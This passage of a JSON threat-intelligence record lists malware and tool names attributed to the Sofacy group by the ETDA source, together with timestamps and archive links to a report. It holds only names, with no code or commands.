"ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1777450926, "ts_updated_at": 1777459312, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/600cac4b4fc9a9b6241a9177429d5ea474950633.pdf", "text": "https://archive.orkl.eu/600cac4b4fc9a9b6241a9177429d5ea474950633.txt", "img": "https://archive.orkl.eu/600cac4b4fc9a9b6241a9177429d5ea474950633.jpg" } }